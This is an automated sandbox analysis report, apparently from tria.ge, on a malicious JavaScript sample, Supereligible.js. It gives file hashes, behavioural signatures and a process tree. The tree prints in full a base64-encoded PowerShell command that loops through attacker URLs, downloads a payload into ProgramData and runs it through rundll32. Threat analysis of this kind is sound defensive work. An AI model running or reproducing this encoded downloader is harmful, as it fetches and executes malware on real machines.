Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
135s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
25/05/2023, 00:06
Static task
static1
Behavioral task
behavioral1
Sample
Supereligible.js
Resource
win10v2004-20230221-en
Behavioral task
behavioral2
Sample
Supereligible.js
Resource
win10v2004-20230220-en
General
-
Target
Supereligible.js
-
Size
289KB
-
MD5
6aaa0df2794cac724a8cac9a2e7b7000
-
SHA1
0d4e4214e7712b3389e31a5fd6713356882f23d2
-
SHA256
971b3f61a90896f2f8e3a64a32758eb9956f0c113079f7fa1fa68066bc466ee0
-
SHA512
67b7a2b4affc187f038a545013fec01404028e23a451527fea9fc33d97cf70ab71f1928dd290ed6a657af98073db06bd509ec21f5cfd5bee5a34e081d0268eb9
-
SSDEEP
6144:ZcmeptsNC1S3TgQ/8VdZqOowvd8lmDNv5BCs:OQkn
Malware Config
Signatures
-
Blocklisted process makes network request 7 IoCs
flow pid Process 20 1960 powershell.exe 32 1960 powershell.exe 38 1960 powershell.exe 41 1960 powershell.exe 44 1960 powershell.exe 45 1960 powershell.exe 47 1960 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1960 powershell.exe 1960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1960 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4324 wrote to memory of 4672 4324 wscript.exe 86 PID 4324 wrote to memory of 4672 4324 wscript.exe 86 PID 4672 wrote to memory of 1960 4672 wscript.exe 88 PID 4672 wrote to memory of 1960 4672 wscript.exe 88
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Supereligible.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\ProgramData\Fidgeter.js" teatimeOrthodox SheepdipQuarrels2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JAB1AG4AYgBsAHUAcwBoAGkAbgBnAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBPAFEAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABZAEEAVwBVAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABrAEEATQBBAEEAdQBBAEQAZwBBAE0AZwBBAHUAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEAegBBAEQAYwBBAFcAVQBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAYwBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQA0AEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBNAEEAQQA9ACIAOwAkAE0AaQBzAHQAcgBpAGEAbAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAEUAQQBOAGcAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQA9AE0AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEAegBBAEMANABBAE0AUQBBAHoAQQBEAGMAQQBMAGcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE8AQQBBADQAQQBBAD0APQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQATQBBAEwAZwBBAHkAQQBEAFEAQQBOAEEAQQB1AEEARABZAEEATwBBAEEAdQBBAEQARQBBAE4AdwBBAHcAQQBBAD0APQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARwBBAEcAawBBAFkAZwBCAHkAQQBHAGsAQQBiAGcAQgB2AEEASABBAEEAYgBBAEIAaABBAEgATQBBAGQAQQBCAHAAQQBHADQAQQBMAGcAQgB3AEEARwBVAEEAIgA7ACQAYQBwAGgAZQBzAGkAcwBCAGEAYwB0AHIAaQB0AGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AUQBBAHUAQQBEAGMAQQBNAEEAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADUAQQBEAEUAQQBMAHcAQQB6AEEASABRAEEAUQBnAEIAbQBBAEQAawBBAEwAdwBCAE4AQQBGAFkAQQBhAHcAQgBKAEEARwBNAEEAaQBaAFkAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADQAQQBEAE0AQQBMAGcAQQAwAEEARABVAEEATABnAEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAEUAQQBNAEEAQQB6AEEAQwA4AEEATgB3AEIATABBAEcANABBAFoAUQBBAHYAQQBHAFEAQQBTAHcAQQA9AGkAWgBZAHkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBBAEEAdQBBAEQAUQBBAE4AQQBBAHUAQQBEAEkAQQBNAFEAQQB5AEEAQwA0AEEATgB3AEEANABBAEMAOABBAFUAQQBBAHYAQQBIAEEAQQBUAEEAQQB5AEEAQQA9AD0AaQBaAFkAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAFEAQQB1AEEARABFAEEATgBBAEEAeABBAEMANABBAE4AQQBBADQAQQBDADQAQQBOAHcAQQB4AEEAQwA4AEEAVwBRAEIANABBAEQAUQBBAFQAZwBBAHYAQQBFAHMAQQBlAEEAQgAzAEEAQQA9AD0AaQBaAFkAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARABZAEEATgBBAEIAbgBBAEgAawBBAE4AZwBCAEwAQQBFAHMAQQBiAFEAQgBEAEEAQQA9AD0AaQBaAFkAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARQBzAEEAZAB3AEIAegBBAEcAdwBBAFMAdwBCAE8AQQBFAFEAQQBpAFoAWQB5AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAGsAQQBFADgAQQBUAFEAQQAzAEEARgBFAEEAYwB3AEIAUgBBAEcAcwBBAGEAQQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUwBhAGMAYwBhAHIAaQBmAHkAIABpAG4AIAAkAGEAcABoAGUAcwBpAHMAQgBhAGMAdAByAGkAdABlAHMAIAAtAHMAcABsAGkAdAAgACIAaQBaAFkAeQAiACkAIAB7AHQAcgB5ACAAewAkAEIAYQBsAGwAcABhAHIAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAHoAQQBHAHcAQQBiAHcAQgAzAEEARwA0AEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAGoAQQBIAEkAQQBhAFEAQgBqAEEARwBzAEEAWgBRAEIAMABBAEEAPQA9ACIAOwAkAFMAdABpAHAAcABsAGUAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABTAGEAYwBjAGEAcgBpAGYAeQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFMAdABpAHAAcABsAGUAcgAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABQAGgAbwBuAG8AZwByAGEAbQBtAGEAdABpAGMAYQBsAC4AcwBpAHMAdABpAG4AZQBOAGUAdQByAGUAcgBnAGkAYwA7ACQAZQBsAGUAYwB0AHIAbwBkAHkAbgBhAG0AbwBtAGUAdABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAFEAQQB1AEEARABJAEEATQBnAEEAegBBAEMANABBAE0AZwBBAHgAQQBEAEUAQQBMAGcAQQB5AEEARABRAEEATgBRAEEAPQBhAGEAWQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQAxAEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AZwBBAHkAQQBEAGMAQQAiADsAJABpAG0AcAByAGUAZwBuAGEAdABvAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAGsAQQBjAEEAQgBzAEEARwA4AEEAWgB3AEIAbABBAEcANABBAGEAUQBCAGoAQQBDADQAQQBjAHcAQgBsAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUABoAG8AbgBvAGcAcgBhAG0AbQBhAHQAaQBjAGEAbAAuAHMAaQBzAHQAaQBuAGUATgBlAHUAcgBlAHIAZwBpAGMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADAANQAwADgANAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEYAQQBBAGEAQQBCAHYAQQBHADQAQQBiAHcAQgBuAEEASABJAEEAWQBRAEIAdABBAEcAMABBAFkAUQBCADAAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEATABnAEIAegBBAEcAawBBAGMAdwBCADAAQQBHAGsAQQBiAGcAQgBsAEEARQA0AEEAWgBRAEIAMQBBAEgASQBBAFoAUQBCAHkAQQBHAGMAQQBhAFEAQgBqAEEAQwB3AEEAWQBnAEIAcABBAEcANABBAFoAQQBBADcAQQBBAD0APQAiADsAJABjAG8AbgB2AGUAeQBhAG4AYwBlAFYAaQBkAHUAbwB1AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAHcAQQA1AEEAQwA0AEEATwBBAEEAMwBBAEMANABBAE0AZwBBAHgAQQBEAGMAQQBMAGcAQQB5AEEARABJAEEATQBnAEEAPQAiADsAJABiAGUAYQB0AGUAcgBzAFUAbgBwAGUAcgBjAGUAaQB2AGUAZABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBADEAQQBEAGcAQQBMAGcAQQAzAEEARABRAEEAYwBMAGoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATwBRAEEAdQBBAEQASQBBAE0AZwBBAHcAQQBDADQAQQBNAFEAQQB5AEEARABNAEEATABnAEEAeQBBAEQAUQBBAE4AZwBBAD0AYwBMAGoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEANQBBAEMANABBAE0AZwBBADAAQQBEAE0AQQBMAGcAQQAwAEEARABRAEEATABnAEEAMgBBAEQAVQBBAGMATABqAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAFkAUQBCAHUAQQBIAFEAQQBZAFEAQgBzAEEARwBrAEEAZQBnAEIAcABBAEcANABBAFoAdwBCAFEAQQBIAE0AQQBaAFEAQgAxAEEARwBRAEEAYgB3AEIAdABBAEgAVQBBAGIAQQBCADAAQQBHAGsAQQBiAEEAQgB2AEEARwBNAEEAZABRAEIAcwBBAEcARQBBAGMAZwBBAHUAQQBHAGcAQQBiAHcAQgBqAEEARwBzAEEAWgBRAEIANQBBAEEAPQA9ACIAOwAkAGkAbgB0AGUAcgBsAGEAYwB1AHMAdAByAGkAbgBlAE0AZQB0AGEAZwBlAG8AbQBlAHQAcgBpAGMAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB1AEEARwA4AEEAYgBnAEIAagBBAEcAOABBAGIAZwBCAG0AQQBHAFUAQQBaAEEAQgBsAEEASABJAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBFAFEAQQBhAFEAQgB3AEEARwB3AEEAYgB3AEIAdwBBAEcAZwBBAGUAUQBCADAAQQBHAFUAQQBMAGcAQgAyAEEARwBrAEEAYwB3AEIAcABBAEcAOABBAGIAZwBBAD0AaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGMAQQBPAEEAQQB1AEEARABFAEEATQBRAEEAMABBAEMANABBAE0AUQBBAHoAQQBEAFUAQQBMAGcAQQB5AEEARABNAEEATQBnAEEAPQBpAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAawBBAE8AUQBBAHUAQQBEAGcAQQBNAFEAQQB1AEEARABVAEEATwBBAEEAdQBBAEQAZwBBAE0AdwBBAD0AaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAGsAQQBMAGcAQQAxAEEARABNAEEATABnAEEAeQBBAEQAQQBBAE4AQQBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA="3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
289KB
MD56aaa0df2794cac724a8cac9a2e7b7000
SHA10d4e4214e7712b3389e31a5fd6713356882f23d2
SHA256971b3f61a90896f2f8e3a64a32758eb9956f0c113079f7fa1fa68066bc466ee0
SHA51267b7a2b4affc187f038a545013fec01404028e23a451527fea9fc33d97cf70ab71f1928dd290ed6a657af98073db06bd509ec21f5cfd5bee5a34e081d0268eb9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82